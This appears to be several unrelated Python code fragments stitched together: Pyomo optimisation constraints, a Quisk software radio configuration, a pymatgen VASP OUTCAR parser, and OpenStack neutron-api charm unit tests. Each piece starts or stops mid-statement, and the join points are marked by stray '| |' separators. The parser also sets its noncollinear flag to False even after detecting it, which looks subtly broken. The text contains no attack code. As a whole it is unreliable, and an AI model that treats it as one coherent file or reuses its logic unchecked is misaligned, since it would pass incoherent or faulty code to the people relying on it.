m.c1583 = Constraint(expr= m.b1020 - m.b1021 <= 0)
m.c1584 = Constraint(expr= m.b1022 - m.b1023 <= 0)
m.c1585 = Constraint(expr= m.b1024 - m.b1025 <= 0)
m.c1586 = Constraint(expr= m.b1026 - m.b1027 <= 0)
m.c1587 = Constraint(expr= m.b1028 - m.b1029 <= 0)
m.c1588 = Constraint(expr= m.b1030 - m.b1031 <= 0)
m.c1589 = Constraint(expr= m.b1032 - m.b1033 <= 0)
m.c1590 = Constraint(expr= m.b1034 - m.b1035 <= 0)
m.c1591 = Constraint(expr= m.b1036 - m.b1037 <= 0)
m.c1592 = Constraint(expr= m.b1038 - m.b1039 <= 0)
m.c1593 = Constraint(expr= m.b1040 - m.b1041 <= 0)
m.c1594 = Constraint(expr= m.b1042 - m.b1043 <= 0)
m.c1595 = Constraint(expr= m.b1044 - m.b1045 <= 0)
m.c1596 = Constraint(expr= m.b1046 - m.b1047 <= 0)
m.c1597 = Constraint(expr= m.b1048 - m.b1049 <= 0)
m.c1598 = Constraint(expr= m.b1050 - m.b1051 <= 0)
m.c1599 = Constraint(expr= m.b1052 - m.b1053 <= 0)
m.c1600 = Constraint(expr= m.b1054 + m.b1055 <= 1)
m.c1601 = Constraint(expr= m.b1054 + m.b1055 <= 1)
m.c1602 = Constraint(expr= m.b1056 + m.b1057 <= 1)
m.c1603 = Constraint(expr= m.b1056 + m.b1057 <= 1)
m.c1604 = Constraint(expr= m.b1058 + m.b1059 <= 1)
m.c1605 = Constraint(expr= m.b1058 + m.b1059 <= 1)
m.c1606 = Constraint(expr= m.b1060 + m.b1061 <= 1)
m.c1607 = Constraint(expr= m.b1060 + m.b1061 <= 1)
m.c1608 = Constraint(expr= m.b1062 + m.b1063 <= 1)
m.c1609 = Constraint(expr= m.b1062 + m.b1063 <= 1)
m.c1610 = Constraint(expr= m.b1064 + m.b1065 <= 1)
m.c1611 = Constraint(expr= m.b1064 + m.b1065 <= 1)
m.c1612 = Constraint(expr= m.b1066 + m.b1067 <= 1)
m.c1613 = Constraint(expr= m.b1066 + m.b1067 <= 1)
m.c1614 = Constraint(expr= m.b1068 + m.b1069 <= 1)
m.c1615 = Constraint(expr= m.b1068 + m.b1069 <= 1)
m.c1616 = Constraint(expr= m.b1070 + m.b1071 <= 1)
m.c1617 = Constraint(expr= m.b1070 + m.b1071 <= 1)
m.c1618 = Constraint(expr= m.b1072 + m.b1073 <= 1)
m.c1619 = Constraint(expr= m.b1072 + m.b1073 <= 1)
m.c1620 = Constraint(expr= m.b1074 + m.b1075 <= 1)
m.c1621 | |
slider.
digital_tx_level = 20
## HiQSDR_BandDict IO Bus, dict
# This sets the preselect (4 bits) on the X1 connector.
HiQSDR_BandDict = {
'160':1, '80':2, '40':3, '30':4, '20':5, '15':6, '17':7,
'12':8, '10':9, '6':10, '500k':11, '137k':12 }
## cw_delay CW Delay, integer
# This is the delay for CW from 0 to 255.
cw_delay = 0
## rx_udp_ip IP address, text
# This is the IP address of your hardware.
# For FPGA firmware version 1.4 and newer, and if enabled, the hardware is set to the IP address you enter here.
# For older firmware, the IP address is programmed into the FPGA, and you must enter that address.
rx_udp_ip = "192.168.2.160"
#rx_udp_ip = "192.168.1.196"
## rx_udp_port Hardware UDP port, integer
# This is the UDP port number of your hardware.
rx_udp_port = 48247
## rx_udp_ip_netmask Network netmask, text
# This is the netmask for the network.
rx_udp_ip_netmask = '255.255.255.0'
## tx_ip Transmit IP, text
# Leave this blank to use the same IP address as the receive hardware. Otherwise, enter "disable"
# to disable sending transmit I/Q samples, or enter the actual IP address. You must enter "disable"
# if you have multiple hardwares on the network, and only one should transmit.
tx_ip = ""
#tx_ip = "disable"
#tx_ip = "192.168.1.201"
## tx_audio_port Tx audio UDP port, integer
# This is the UDP port for transmit audio I/Q samples. Enter zero to calculate this from the
# base hardware port. Otherwise enter the special custom port.
tx_audio_port = 0
## rx_udp_clock Clock frequency Hertz, integer
# This is the clock frequency of the hardware in Hertz.
rx_udp_clock = 122880000
## sndp_active Enable setting IP, boolean
# If possible, set the IP address to the address entered.
# For FPGA firmware version 1.4 and newer, the hardware is set to the IP address you enter here.
# For older firmware, the IP address is programmed into the FPGA, and you must enter that address.
sndp_active = True
#sndp_active = False
## radio_sound_ip IP sound play, text
# This option sends radio playback sound to a UDP device. Some SDR hardware devices have an
# audio codec that can play radio sound with less latency than a soundcard. The sample rate
# is the same as the soundcard sample rate, but probably you will want 48000 sps. The UDP
# data consists of two bytes of zero, followed by the specified number of samples. Each
# sample consists of two bytes (a short) of I data and two bytes of Q data in little-endian order.
# For radio_sound_nsamples = 360, the total number of UDP data bytes is 1442.
#radio_sound_ip = "192.168.2.160"
## radio_sound_port UDP port play, integer
# The UDP port of the radio sound play device.
#radio_sound_port = 48250
## radio_sound_nsamples Num play samples, integer
# The number of play samples per UDP block.
#radio_sound_nsamples = 360
## radio_sound_mic_ip IP microphone, text
# This option receives microphone samples from a UDP device. The UDP
# data consists of two bytes of zero, followed by the specified number of samples. Each
# sample consists of two bytes (a short) of monophonic microphone data in little-endian order.
# For radio_sound_mic_nsamples = 720, the total number of UDP data bytes is 1442.
#radio_sound_mic_ip = "192.168.2.160"
## radio_sound_mic_port UDP port mic, integer
# The UDP port of the microphone device.
#radio_sound_mic_port = 48251
## radio_sound_mic_nsamples Num mic samples, integer
# The number of mic samples per UDP block.
#radio_sound_mic_nsamples = 720
## radio_sound_mic_boost Mic boost, boolean
# Use False for no microphone boost, or True for +20 dB boost.
#radio_sound_mic_boost = False
#radio_sound_mic_boost = True
################ Receivers Odyssey2, The Odyssey-2 project using the HPSDR Hermes protocol
## hardware_file_name Hardware file path, rfile
# This is the file that contains the control logic for each radio.
#hardware_file_name = 'hermes/quisk_hardware.py'
## widgets_file_name Widget file path, rfile
# This optional file adds additional controls for the radio.
#widgets_file_name = 'hermes/quisk_widgets.py'
# Use the file hermes/quisk_conf.py as a model config file. The Hermes can obtain its IP address from
# DHCP. Set rx_udp_ip to the null string in this case. Or use rx_udp_ip to specify an IP address, but
# be sure it is unique and not in use by a DHCP server.
# You can set these options:
## use_rx_udp Hardware type, integer choice
# This is the type of UDP hardware. Use 10 for the Hermes protocol.
#use_rx_udp = 10
## rx_udp_ip IP change, text
# This item should be left blank. It is used to change the IP address of the hardware to a different
# IP once the hardware is found. Not all Hermes firmware supports changing the IP address.
#rx_udp_ip = ""
## rx_udp_port Hardware UDP port, integer
# This is the UDP port number of your hardware.
#rx_udp_port = 1024
## rx_udp_ip_netmask Network netmask, text
# This is the netmask for the network.
#rx_udp_ip_netmask = '255.255.255.0'
## tx_ip Transmit IP, text
# Leave this blank to use the same IP address as the receive hardware. Otherwise, enter "disable"
# to disable sending transmit I/Q samples, or enter the actual IP address. You must enter "disable"
# if you have multiple hardwares on the network, and only one should transmit. This item is normally blank.
tx_ip = ""
#tx_ip = "disable"
## tx_audio_port Tx audio UDP port, integer
# This is the UDP port for transmit audio I/Q samples. Enter zero to calculate this from the
# base hardware port. Otherwise enter the special custom port.
tx_audio_port = 0
## rx_udp_clock Clock frequency Hertz, integer
# This is the clock frequency of the hardware in Hertz. For Odyssey use 122880000.
#rx_udp_clock = 122880000
## tx_level Tx Level, dict
# tx_level sets the transmit level 0 to 255 for each band. The None band is the default.
# The config screen has a slider 0 to 100% so you can reduce the transmit power. The sliders
# only appear if your hardware defines the method SetTxLevel(). The hardware only supports a
# limited adjustment range, so zero is still a small amount of power.
tx_level = {
None:120, '60':110}
## digital_tx_level Digital Tx power %, integer
# Digital modes reduce power by the percentage on the config screen.
# This is the maximum value of the slider.
#digital_tx_level = 20
## hermes_code_version Hermes code version, integer
# There can be multiple Hermes devices on a network, but Quisk can only use one of these. If you have multiple
# Hermes devices, you can use this to specify a unique device. Or use -1 to accept any board.
hermes_code_version = -1
## hermes_board_id Hermes board ID, integer
# There can be multiple Hermes devices on a network, but Quisk can only use one of these. If you have multiple
# Hermes devices, you can use this to specify a unique device. Or use -1 to accept any board.
hermes_board_id = -1
## hermes_LNA_dB Initial LNA dB, integer
# The initial value for the low noise Rx amplifier gain in dB.
hermes_LNA_dB = 20
## Hermes_BandDict Hermes Bus, dict
# The Hermes_BandDict sets the 7 bits on the J16 connector.
Hermes_BandDict = {
'160':0b0000001, '80':0b0000010, '60':0b0000100, '40':0b0001000, '30':0b0010000, '20':0b0100000, '15':0b1000000}
## Hermes_BandDictTx Tx IO Bus, dict
# The Hermes_BandDictTx sets the 7 bits on the J16 connector for Tx if enabled.
Hermes_BandDictTx = {'160':0, '80':0, '60':0, '40':0, '30':0, '20':0, '17':0, '15':0, '12':0, '10':0}
## Hermes_BandDictEnTx Enable Tx Filt, boolean
# Enable the separate Rx and Tx settings for the J16 connector.
Hermes_BandDictEnTx = False
#Hermes_BandDictEnTx = True
## AlexHPF Alex High Pass Filters, list
# This is a list of frequencies and high pass filter settings.
AlexHPF = [
['3.0', '4.5', 0, 0], ['6.5', '8.5', 0, 0]] + [['', '', 0, 0]] * 6
## AlexLPF Alex Low Pass Filters, list
# This is a list of frequencies and low pass filter settings.
AlexLPF = [
['3.0', '4.5', 0, 0], ['6.5', '8.5', 0, 0]] + [['', '', 0, 0]] * 6
## AlexHPF_TxEn Alex HPF Tx Enable, boolean
AlexHPF_TxEn = False
#AlexHPF_TxEn = True
## AlexLPF_TxEn Alex LPF Tx Enable, boolean
AlexLPF_TxEn = False
#AlexLPF_TxEn = True
################ Receivers Afedri, The Afedri SDR receiver with the Ethernet interface.
## hardware_file_name Hardware file path, rfile
# This is the file that contains the control logic for each radio.
#hardware_file_name = 'afedrinet/quisk_hardware.py'
## widgets_file_name Widget file path, rfile
# This optional file adds additional controls for the radio.
#widgets_file_name = ''
## rx_udp_ip IP address, text
# This is the IP address of your hardware. Enter 0.0.0.0 to search for the address.
#rx_udp_ip = "0.0.0.0"
#rx_udp_ip = "192.168.0.200"
#rx_udp_ip = "192.168.1.196"
## rx_udp_port Hardware UDP port, integer
# This is the base UDP port number of your hardware.
#rx_udp_port = 50000
## rx_udp_ip_netmask Network netmask, text
# This is the netmask for the network.
#rx_udp_ip_netmask = '255.255.255.0'
## rx_udp_clock Clock frequency Hertz, integer
# This is the clock frequency of the hardware in Hertz.
#rx_udp_clock = 80000000
## default_rf_gain Default RF | |
electrostatic_potential
Average electrostatic potential at each atomic position in order
of the atoms in POSCAR.
..attribute: final_energy_contribs
Individual contributions to the total final energy as a dictionary.
Include contirbutions from keys, e.g.:
{'DENC': -505778.5184347, 'EATOM': 15561.06492564, 'EBANDS': -804.53201231,
'EENTRO': -0.08932659, 'EXHF': 0.0, 'Ediel_sol': 0.0,
'PAW double counting': 664.6726974100002, 'PSCENC': 742.48691646,
'TEWEN': 489742.86847338, 'XCENC': -169.64189814}
.. attribute:: efermi
Fermi energy
.. attribute:: filename
Filename
.. attribute:: final_energy
Final (total) energy
.. attribute:: has_onsite_density_matrices
Boolean for if onsite density matrices have been set
.. attribute:: lcalcpol
If LCALCPOL has been set
.. attribute:: lepsilon
If LEPSILON has been set
.. attribute:: nelect
Returns the number of electrons in the calculation
.. attribute:: spin
If spin-polarization was enabled via ISPIN
.. attribute:: total_mag
Total magnetization (in terms of the number of unpaired electrons)
One can then call a specific reader depending on the type of run being
performed. These are currently: read_igpar(), read_lepsilon() and
read_lcalcpol(), read_core_state_eign(), read_avg_core_pot().
See the documentation of those methods for more documentation.
Authors: <NAME>, <NAME>
"""
def __init__(self, filename):
"""
Args:
filename (str): OUTCAR filename to parse.
"""
self.filename = filename
self.is_stopped = False
# data from end of OUTCAR
charge = []
mag_x = []
mag_y = []
mag_z = []
header = []
run_stats = {}
total_mag = None
nelect = None
efermi = None
total_energy = None
time_patt = re.compile(r"\((sec|kb)\)")
efermi_patt = re.compile(r"E-fermi\s*:\s*(\S+)")
nelect_patt = re.compile(r"number of electron\s+(\S+)\s+magnetization")
mag_patt = re.compile(r"number of electron\s+\S+\s+magnetization\s+(" r"\S+)")
toten_pattern = re.compile(r"free energy TOTEN\s+=\s+([\d\-\.]+)")
all_lines = []
for line in reverse_readfile(self.filename):
clean = line.strip()
all_lines.append(clean)
if clean.find("soft stop encountered! aborting job") != -1:
self.is_stopped = True
else:
if time_patt.search(line):
tok = line.strip().split(":")
try:
# try-catch because VASP 6.2.0 may print
# Average memory used (kb): N/A
# which cannot be parsed as float
run_stats[tok[0].strip()] = float(tok[1].strip())
except ValueError:
run_stats[tok[0].strip()] = None
continue
m = efermi_patt.search(clean)
if m:
try:
# try-catch because VASP sometimes prints
# 'E-fermi: ******** XC(G=0): -6.1327
# alpha+bet : -1.8238'
efermi = float(m.group(1))
continue
except ValueError:
efermi = None
continue
m = nelect_patt.search(clean)
if m:
nelect = float(m.group(1))
m = mag_patt.search(clean)
if m:
total_mag = float(m.group(1))
if total_energy is None:
m = toten_pattern.search(clean)
if m:
total_energy = float(m.group(1))
if all([nelect, total_mag is not None, efermi is not None, run_stats]):
break
# For single atom systems, VASP doesn't print a total line, so
# reverse parsing is very difficult
read_charge = False
read_mag_x = False
read_mag_y = False # for SOC calculations only
read_mag_z = False
all_lines.reverse()
for clean in all_lines:
if read_charge or read_mag_x or read_mag_y or read_mag_z:
if clean.startswith("# of ion"):
header = re.split(r"\s{2,}", clean.strip())
header.pop(0)
else:
m = re.match(r"\s*(\d+)\s+(([\d\.\-]+)\s+)+", clean)
if m:
toks = [float(i) for i in re.findall(r"[\d\.\-]+", clean)]
toks.pop(0)
if read_charge:
charge.append(dict(zip(header, toks)))
elif read_mag_x:
mag_x.append(dict(zip(header, toks)))
elif read_mag_y:
mag_y.append(dict(zip(header, toks)))
elif read_mag_z:
mag_z.append(dict(zip(header, toks)))
elif clean.startswith("tot"):
read_charge = False
read_mag_x = False
read_mag_y = False
read_mag_z = False
if clean == "total charge":
charge = []
read_charge = True
read_mag_x, read_mag_y, read_mag_z = False, False, False
elif clean == "magnetization (x)":
mag_x = []
read_mag_x = True
read_charge, read_mag_y, read_mag_z = False, False, False
elif clean == "magnetization (y)":
mag_y = []
read_mag_y = True
read_charge, read_mag_x, read_mag_z = False, False, False
elif clean == "magnetization (z)":
mag_z = []
read_mag_z = True
read_charge, read_mag_x, read_mag_y = False, False, False
elif re.search("electrostatic", clean):
read_charge, read_mag_x, read_mag_y, read_mag_z = (
False,
False,
False,
False,
)
# merge x, y and z components of magmoms if present (SOC calculation)
if mag_y and mag_z:
# TODO: detect spin axis
mag = []
for idx in range(len(mag_x)):
mag.append(
{key: Magmom([mag_x[idx][key], mag_y[idx][key], mag_z[idx][key]]) for key in mag_x[0].keys()}
)
else:
mag = mag_x
# data from beginning of OUTCAR
run_stats["cores"] = 0
with zopen(filename, "rt") as f:
for line in f:
if "running" in line:
run_stats["cores"] = line.split()[2]
break
self.run_stats = run_stats
self.magnetization = tuple(mag)
self.charge = tuple(charge)
self.efermi = efermi
self.nelect = nelect
self.total_mag = total_mag
self.final_energy = total_energy
self.data = {}
# Read "total number of plane waves", NPLWV:
self.read_pattern(
{"nplwv": r"total plane-waves NPLWV =\s+(\*{6}|\d+)"},
terminate_on_match=True,
)
try:
self.data["nplwv"] = [[int(self.data["nplwv"][0][0])]]
except ValueError:
self.data["nplwv"] = [[None]]
nplwvs_at_kpoints = [
n
for [n] in self.read_table_pattern(
r"\n{3}-{104}\n{3}",
r".+plane waves:\s+(\*{6,}|\d+)",
r"maximum and minimum number of plane-waves",
)
]
self.data["nplwvs_at_kpoints"] = [None for n in nplwvs_at_kpoints]
for (n, nplwv) in enumerate(nplwvs_at_kpoints):
try:
self.data["nplwvs_at_kpoints"][n] = int(nplwv)
except ValueError:
pass
# Read the drift:
self.read_pattern(
{"drift": r"total drift:\s+([\.\-\d]+)\s+([\.\-\d]+)\s+([\.\-\d]+)"},
terminate_on_match=False,
postprocess=float,
)
self.drift = self.data.get("drift", [])
# Check if calculation is spin polarized
self.spin = False
self.read_pattern({"spin": "ISPIN = 2"})
if self.data.get("spin", []):
self.spin = True
# Check if calculation is noncollinear
self.noncollinear = False
self.read_pattern({"noncollinear": "LNONCOLLINEAR = T"})
if self.data.get("noncollinear", []):
self.noncollinear = False
# Check if the calculation type is DFPT
self.dfpt = False
self.read_pattern(
{"ibrion": r"IBRION =\s+([\-\d]+)"},
terminate_on_match=True,
postprocess=int,
)
if self.data.get("ibrion", [[0]])[0][0] > 6:
self.dfpt = True
self.read_internal_strain_tensor()
# Check to see if LEPSILON is true and read piezo data if so
self.lepsilon = False
self.read_pattern({"epsilon": "LEPSILON= T"})
if self.data.get("epsilon", []):
self.lepsilon = True
self.read_lepsilon()
# only read ionic contribution if DFPT is turned on
if self.dfpt:
self.read_lepsilon_ionic()
# Check to see if LCALCPOL is true and read polarization data if so
self.lcalcpol = False
self.read_pattern({"calcpol": "LCALCPOL = T"})
if self.data.get("calcpol", []):
self.lcalcpol = True
self.read_lcalcpol()
self.read_pseudo_zval()
# Read electrostatic potential
self.electrostatic_potential = None
self.ngf = None
self.sampling_radii = None
self.read_pattern({"electrostatic": r"average \(electrostatic\) potential at core"})
if self.data.get("electrostatic", []):
self.read_electrostatic_potential()
self.nmr_cs = False
self.read_pattern({"nmr_cs": r"LCHIMAG = (T)"})
if self.data.get("nmr_cs", None):
self.nmr_cs = True
self.read_chemical_shielding()
self.read_cs_g0_contribution()
self.read_cs_core_contribution()
self.read_cs_raw_symmetrized_tensors()
self.nmr_efg = False
self.read_pattern({"nmr_efg": r"NMR quadrupolar parameters"})
if self.data.get("nmr_efg", None):
self.nmr_efg = True
self.read_nmr_efg()
self.read_nmr_efg_tensor()
self.has_onsite_density_matrices = False
self.read_pattern(
{"has_onsite_density_matrices": r"onsite density matrix"},
terminate_on_match=True,
)
if "has_onsite_density_matrices" in self.data:
self.has_onsite_density_matrices = True
self.read_onsite_density_matrices()
# Store the individual contributions to the final total energy
final_energy_contribs = {}
for k in [
"PSCENC",
"TEWEN",
"DENC",
"EXHF",
"XCENC",
"PAW double counting",
"EENTRO",
"EBANDS",
"EATOM",
"Ediel_sol",
]:
if k == "PAW double counting":
self.read_pattern({k: r"%s\s+=\s+([\.\-\d]+)\s+([\.\-\d]+)" % (k)})
else:
self.read_pattern({k: r"%s\s+=\s+([\d\-\.]+)" % (k)})
if not self.data[k]:
continue
final_energy_contribs[k] = sum(float(f) for f in self.data[k][-1])
self.final_energy_contribs = final_energy_contribs
def read_pattern(self, patterns, reverse=False, terminate_on_match=False, postprocess=str):
r"""
General pattern reading. Uses monty's regrep method. Takes the same
arguments.
Args:
patterns (dict): A dict of patterns, e.g.,
{"energy": r"energy\\(sigma->0\\)\\s+=\\s+([\\d\\-.]+)"}.
reverse (bool): Read files in reverse. Defaults to false. Useful for
large files, esp OUTCARs, especially when used with
terminate_on_match.
terminate_on_match (bool): Whether to terminate when there is at
least one match in each key in pattern.
postprocess (callable): A post processing function to convert all
matches. Defaults to str, i.e., no change.
Renders accessible:
Any attribute in patterns. For example,
{"energy": r"energy\\(sigma->0\\)\\s+=\\s+([\\d\\-.]+)"} will set the
value of self.data["energy"] = [[-1234], [-3453], ...], to the
results from regex and postprocess. Note that the returned values
are lists of lists, because you can grep multiple items on one line.
"""
matches = regrep(
self.filename,
patterns,
reverse=reverse,
terminate_on_match=terminate_on_match,
postprocess=postprocess,
)
for k in patterns.keys():
self.data[k] = [i[0] for i in matches.get(k, [])]
def read_table_pattern(
self,
header_pattern,
row_pattern,
footer_pattern,
postprocess=str,
attribute_name=None,
last_one_only=True,
):
r"""
Parse table-like data. A table composes of three parts: header,
main body, footer. All the data matches "row pattern" in the main body
will be returned.
Args:
header_pattern (str): The regular expression pattern matches the
table header. This pattern should match all the text
immediately before the main body of the table. For multiple
sections table match the text until the section of
interest. MULTILINE and DOTALL options are enforced, as a
result, the "." meta-character will also match "\n" in this
section.
row_pattern (str): The regular expression matches a single line in
the table. Capture interested field using regular expression
groups.
footer_pattern (str): The regular expression matches the end of the
table. E.g. a long dash line.
postprocess (callable): A post | |
<gh_stars>0
# Copyright 2016 Canonical Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from mock import patch
import neutron_api_context as context
import charmhelpers
from test_utils import CharmTestCase
TO_PATCH = [
'config',
'determine_api_port',
'determine_apache_port',
'log',
'os_release',
'relation_get',
'relation_ids',
'related_units',
]
class GeneralTests(CharmTestCase):
def setUp(self):
super(GeneralTests, self).setUp(context, TO_PATCH)
self.relation_get.side_effect = self.test_relation.get
self.config.side_effect = self.test_config.get
def test_l2population(self):
self.test_config.set('l2-population', True)
self.test_config.set('neutron-plugin', 'ovs')
self.assertEquals(context.get_l2population(), True)
def test_l2population_nonovs(self):
self.test_config.set('l2-population', True)
self.test_config.set('neutron-plugin', 'nsx')
self.assertEquals(context.get_l2population(), False)
def test_get_overlay_network_type(self):
self.test_config.set('overlay-network-type', 'gre')
self.assertEquals(context.get_overlay_network_type(), 'gre')
def test_get_overlay_network_type_multi(self):
self.test_config.set('overlay-network-type', 'gre vxlan')
self.assertEquals(context.get_overlay_network_type(), 'gre,vxlan')
def test_get_overlay_network_type_unsupported(self):
self.test_config.set('overlay-network-type', 'tokenring')
with self.assertRaises(ValueError) as _exceptctxt:
context.get_overlay_network_type()
self.assertEqual(_exceptctxt.exception.message,
'Unsupported overlay-network-type tokenring')
def test_get_l3ha(self):
self.test_config.set('enable-l3ha', True)
self.test_config.set('overlay-network-type', 'gre')
self.test_config.set('neutron-plugin', 'ovs')
self.test_config.set('l2-population', False)
self.os_release.return_value = 'juno'
self.assertEquals(context.get_l3ha(), True)
def test_get_l3ha_prejuno(self):
self.test_config.set('enable-l3ha', True)
self.test_config.set('overlay-network-type', 'gre')
self.test_config.set('neutron-plugin', 'ovs')
self.test_config.set('l2-population', False)
self.os_release.return_value = 'icehouse'
self.assertEquals(context.get_l3ha(), False)
def test_get_l3ha_l2pop(self):
self.test_config.set('enable-l3ha', True)
self.test_config.set('overlay-network-type', 'gre')
self.test_config.set('neutron-plugin', 'ovs')
self.test_config.set('l2-population', True)
self.os_release.return_value = 'juno'
self.assertEquals(context.get_l3ha(), False)
def test_get_dvr(self):
self.test_config.set('enable-dvr', True)
self.test_config.set('enable-l3ha', False)
self.test_config.set('overlay-network-type', 'vxlan')
self.test_config.set('neutron-plugin', 'ovs')
self.test_config.set('l2-population', True)
self.os_release.return_value = 'juno'
self.assertEquals(context.get_dvr(), True)
def test_get_dvr_explicit_off(self):
self.test_config.set('enable-dvr', False)
self.test_config.set('enable-l3ha', False)
self.test_config.set('overlay-network-type', 'vxlan')
self.test_config.set('neutron-plugin', 'ovs')
self.test_config.set('l2-population', True)
self.os_release.return_value = 'juno'
self.assertEquals(context.get_dvr(), False)
def test_get_dvr_prejuno(self):
self.test_config.set('enable-dvr', True)
self.test_config.set('enable-l3ha', False)
self.test_config.set('overlay-network-type', 'vxlan')
self.test_config.set('neutron-plugin', 'ovs')
self.test_config.set('l2-population', True)
self.os_release.return_value = 'icehouse'
self.assertEquals(context.get_dvr(), False)
def test_get_dvr_gre(self):
self.test_config.set('enable-dvr', True)
self.test_config.set('enable-l3ha', False)
self.test_config.set('overlay-network-type', 'gre')
self.test_config.set('neutron-plugin', 'ovs')
self.test_config.set('l2-population', True)
self.os_release.return_value = 'juno'
self.assertEquals(context.get_dvr(), False)
def test_get_dvr_gre_kilo(self):
self.test_config.set('enable-dvr', True)
self.test_config.set('enable-l3ha', False)
self.test_config.set('overlay-network-type', 'gre')
self.test_config.set('neutron-plugin', 'ovs')
self.test_config.set('l2-population', True)
self.os_release.return_value = 'kilo'
self.assertEquals(context.get_dvr(), True)
def test_get_dvr_vxlan_kilo(self):
self.test_config.set('enable-dvr', True)
self.test_config.set('enable-l3ha', False)
self.test_config.set('overlay-network-type', 'vxlan')
self.test_config.set('neutron-plugin', 'ovs')
self.test_config.set('l2-population', True)
self.os_release.return_value = 'kilo'
self.assertEquals(context.get_dvr(), True)
def test_get_dvr_l3ha_on(self):
self.test_config.set('enable-dvr', True)
self.test_config.set('enable-l3ha', True)
self.test_config.set('overlay-network-type', 'vxlan')
self.test_config.set('neutron-plugin', 'ovs')
self.test_config.set('l2-population', False)
self.os_release.return_value = 'juno'
self.assertEquals(context.get_dvr(), False)
def test_get_dvr_l2pop(self):
self.test_config.set('enable-dvr', True)
self.test_config.set('enable-l3ha', False)
self.test_config.set('overlay-network-type', 'vxlan')
self.test_config.set('neutron-plugin', 'ovs')
self.test_config.set('l2-population', False)
self.os_release.return_value = 'juno'
self.assertEquals(context.get_dvr(), False)
class IdentityServiceContext(CharmTestCase):
def setUp(self):
super(IdentityServiceContext, self).setUp(context, TO_PATCH)
self.relation_get.side_effect = self.test_relation.get
self.config.side_effect = self.test_config.get
self.test_config.set('region', 'region457')
self.test_config.set('prefer-ipv6', False)
@patch.object(charmhelpers.contrib.openstack.context, 'format_ipv6_addr')
@patch.object(charmhelpers.contrib.openstack.context, 'context_complete')
@patch.object(charmhelpers.contrib.openstack.context, 'relation_get')
@patch.object(charmhelpers.contrib.openstack.context, 'related_units')
@patch.object(charmhelpers.contrib.openstack.context, 'relation_ids')
@patch.object(charmhelpers.contrib.openstack.context, 'log')
def test_ids_ctxt(self, _log, _rids, _runits, _rget, _ctxt_comp,
format_ipv6_addr):
_rids.return_value = 'rid1'
_runits.return_value = 'runit'
_ctxt_comp.return_value = True
id_data = {
'service_port': 9876,
'service_host': '127.0.0.4',
'auth_host': '127.0.0.5',
'auth_port': 5432,
'service_tenant': 'ten',
'service_username': 'admin',
'service_password': '<PASSWORD>',
}
_rget.return_value = id_data
ids_ctxt = context.IdentityServiceContext()
self.assertEquals(ids_ctxt()['region'], 'region457')
@patch.object(charmhelpers.contrib.openstack.context, 'relation_ids')
@patch.object(charmhelpers.contrib.openstack.context, 'log')
def test_ids_ctxt_no_rels(self, _log, _rids):
_rids.return_value = []
ids_ctxt = context.IdentityServiceContext()
self.assertEquals(ids_ctxt(), None)
class HAProxyContextTest(CharmTestCase):
def setUp(self):
super(HAProxyContextTest, self).setUp(context, TO_PATCH)
self.determine_api_port.return_value = 9686
self.determine_apache_port.return_value = 9686
self.api_port = 9696
def tearDown(self):
super(HAProxyContextTest, self).tearDown()
@patch.object(charmhelpers.contrib.openstack.context, 'relation_ids')
@patch.object(charmhelpers.contrib.openstack.context, 'log')
def test_context_No_peers(self, _log, _rids):
_rids.return_value = []
hap_ctxt = context.HAProxyContext()
with patch('__builtin__.__import__'):
self.assertTrue('units' not in hap_ctxt())
@patch.object(
charmhelpers.contrib.openstack.context, 'get_netmask_for_address')
@patch.object(
charmhelpers.contrib.openstack.context, 'get_address_in_network')
@patch.object(charmhelpers.contrib.openstack.context, 'config')
@patch.object(charmhelpers.contrib.openstack.context, 'local_unit')
@patch.object(charmhelpers.contrib.openstack.context, 'unit_get')
@patch.object(charmhelpers.contrib.openstack.context, 'relation_get')
@patch.object(charmhelpers.contrib.openstack.context, 'related_units')
@patch.object(charmhelpers.contrib.openstack.context, 'relation_ids')
@patch.object(charmhelpers.contrib.openstack.context, 'log')
@patch.object(charmhelpers.contrib.openstack.context, 'kv')
@patch('__builtin__.__import__')
@patch('__builtin__.open')
def test_context_peers(self, _open, _import, _kv, _log, _rids, _runits,
_rget, _uget, _lunit, _config,
_get_address_in_network, _get_netmask_for_address):
unit_addresses = {
'neutron-api-0': '10.10.10.10',
'neutron-api-1': '10.10.10.11',
}
_rids.return_value = ['rid1']
_runits.return_value = ['neutron-api/0']
_rget.return_value = unit_addresses['neutron-api-0']
_lunit.return_value = "neutron-api/1"
_uget.return_value = unit_addresses['neutron-api-1']
_config.return_value = None
_get_address_in_network.return_value = None
_get_netmask_for_address.return_value = '255.255.255.0'
_kv().get.return_value = 'abcdefghijklmnopqrstuvwxyz123456'
service_ports = {'neutron-server': [9696, 9686]}
self.maxDiff = None
ctxt_data = {
'local_host': '127.0.0.1',
'haproxy_host': '0.0.0.0',
'local_host': '127.0.0.1',
'stat_port': '8888',
'stat_password': '<PASSWORD>',
'frontends': {
'10.10.10.11': {
'network': '10.10.10.11/255.255.255.0',
'backends': unit_addresses,
}
},
'default_backend': '10.10.10.11',
'service_ports': service_ports,
'neutron_bind_port': 9686,
}
_import().api_port.return_value = 9696
hap_ctxt = context.HAProxyContext()
self.assertEquals(hap_ctxt(), ctxt_data)
_open.assert_called_with('/etc/default/haproxy', 'w')
class NeutronCCContextTest(CharmTestCase):
def setUp(self):
super(NeutronCCContextTest, self).setUp(context, TO_PATCH)
self.relation_get.side_effect = self.test_relation.get
self.config.side_effect = self.test_config.get
self.api_port = 9696
self.determine_api_port.return_value = self.api_port
self.test_config.set('neutron-plugin', 'ovs')
self.test_config.set('neutron-security-groups', True)
self.test_config.set('debug', True)
self.test_config.set('verbose', True)
self.test_config.set('neutron-external-network', 'bob')
self.test_config.set('nsx-username', 'bob')
self.test_config.set('nsx-password', '<PASSWORD>')
self.test_config.set('nsx-tz-uuid', 'tzuuid')
self.test_config.set('nsx-l3-uuid', 'l3uuid')
self.test_config.set('nsx-controllers', 'ctrl1 ctrl2')
self.test_config.set('vsd-server', '192.168.2.202')
self.test_config.set('vsd-auth', 'fooadmin:password')
self.test_config.set('vsd-organization', 'foo')
self.test_config.set('vsd-base-uri', '/nuage/api/v1_0')
self.test_config.set('vsd-netpart-name', 'foo-enterprise')
self.test_config.set('plumgrid-username', 'plumgrid')
self.test_config.set('plumgrid-password', '<PASSWORD>')
